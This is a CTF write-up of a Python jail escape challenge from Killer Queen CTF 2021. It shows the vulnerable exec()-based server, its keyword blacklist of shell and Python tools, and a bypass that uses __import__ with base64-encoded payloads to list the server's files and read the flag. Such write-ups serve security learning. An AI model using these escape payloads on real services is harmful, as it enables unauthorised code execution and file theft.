📖
CTF Wiki
  • 🚩Arne's CTF Writeups!
  • 2025
    • TUCTF
      • Forensics - Security Rocks
    • San Diego CTF
      • Crypto - RustSA
      • Misc - Triglot
  • 2024
    • Lexington CTF
      • Misc - a little bit of tomcroppery
    • Imaginary CTF
      • Web - Journal
    • Space Heroes CTF
      • Web - Antikythera
    • HTB Cyber Apocalypse
      • Pwn - Sound of Silence
      • Misc - MultiDigilingual
  • 2023
    • NahamConCTF
      • Mobile - Red Light Green Light
    • BucketCTF
      • Rev - Schematic
      • Rev - Random security
    • HTB Cyber Apocalypse
      • Rev - Cave System
      • Rev - Somewhat Linear
      • Pwn - Void
  • 2022
    • DownUnderCTF 2022
      • Cloud - Jimmy Builds a Kite
    • Ã¥ngstromCTF 2022
      • Pwn - really obnoxious problem
      • Pwn - whatsmyname
    • Engineer CTF
      • Misc - Not really random
      • Misc - Broken Pieces
    • KnightCTF 2022
    • HTB CTF: Dirty Money
      • Forensics - Perseverance
  • 2021
    • MetaCTF CyberGames 2021
    • HTB - Cyber Santa
      • RE - Infiltration
    • Securebug CTF Thor 2021
      • Web - Tricks 1
      • Web - Tricks 2
      • RE - Hidden in Plain Sight
    • TFC CTF 2021
      • RE - Crackity
      • Pwn - Jumpy
      • Misc - Weird Friend
    • K3RN3L CTF 2021
      • Crypto - Pascal RSA
    • DamCTF 2021
      • Misc - library-of-babel
      • Pwn - cookie-monster
    • Killer Queen CTF 2021
      • Pwn - Tweety Birb
      • Forensics - Tippy Tappies
      • Pwn - I want to break free
    • BuckeyeCTF 2021
      • Web - pay2win
      • Misc - USB Exfiltration
Powered by GitBook
On this page
  • Description
  • Downloads
  • Solution
  1. 2021
  2. Killer Queen CTF 2021

Pwn - I want to break free

204 solves | 205 points

Last updated 3 years ago

Description

I want to break free... from this Python jail.

Downloads

Solution

This time we need to escape a python jail. We are provided the source code and server address so, the goal is likely to gain code execution on the server. Taking a look at the source code:

#!/usr/bin/env python3

def server():
    message = """
    You are in jail. Can you escape?
"""
    print(message)
    while True:
        try:
            data = input("> ")
            safe = True
            for char in data:
                if not (ord(char)>=33 and ord(char)<=126):
                    safe = False
            with open("blacklist.txt","r") as f:
                badwords = f.readlines()
            for badword in badwords:
                if badword in data or data in badword:
                    safe = False
            if safe:
                print(exec(data))
            else:
                print("You used a bad word!")
        except Exception as e:
            print("Something went wrong.")
            print(e)
            exit()

if __name__ == "__main__":      
    server()

And the blacklist:

cat
grep
nano
import
eval
subprocess
input
sys
execfile
builtins
open
dict
exec
for
dir
file
input
write
while
echo
print
int
os

The code is very simple and given the limited attack surface area, we can immediately tell that vulnerable code is in the exec command. The first thing we want to do is to try to use the import command as that would allow us to do many things. However, it didn't work because the import command is blacklisted. A quick search of python sandbox escape payloads, gives us the __import__ keyword and it bypassed the blacklist!

Hmm, that's weird though. Shouldn't line 18 of the source code prevent this since import is in the __import__ string? Let's print out the blacklist array at line 17 by adding print(badwords).

Ahh, now it all makes sense. The python file readlines() method not only read in the blacklisted words but also the newline character. Since __import__ in not in the import\n string and import\n string is not in the __import__ string, the sanitization is bypassed. Afterwards, gaining access is trivial. There are probably many ways to read the flag but during the CTF, we used python's default base64 library to encode and decode our payload. The first command we sent was to list the server's directory: 

# Actual encoded b64 payload: print(__import__('os').listdir())
__import__('base64').b64decode('cHJpbnQoX19pbXBvcnRfXygnb3MnKS5saXN0ZGlyKCkp')

There is a suspicious text file with a really long file name. Our next payload is to read that file:

# Actual encoded b64 payload: print(open("cf7728be7980fd770ce03d9d937d6d4087310f02db7fcba6ebbad38bd641ba19.txt").read())
__import__('base64').b64decode('cHJpbnQob3BlbigiY2Y3NzI4YmU3OTgwZmQ3NzBjZTAzZDlkOTM3ZDZkNDA4NzMxMGYwMmRiN2ZjYmE2ZWJiYWQzOGJkNjQxYmExOS50eHQiKS5yZWFkKCkp')

Flag: kqctf{0h_h0w_1_w4n7_70_br34k_fr33_e73nfk1788234896a174nc}

1KB
jailpublic.zip
archive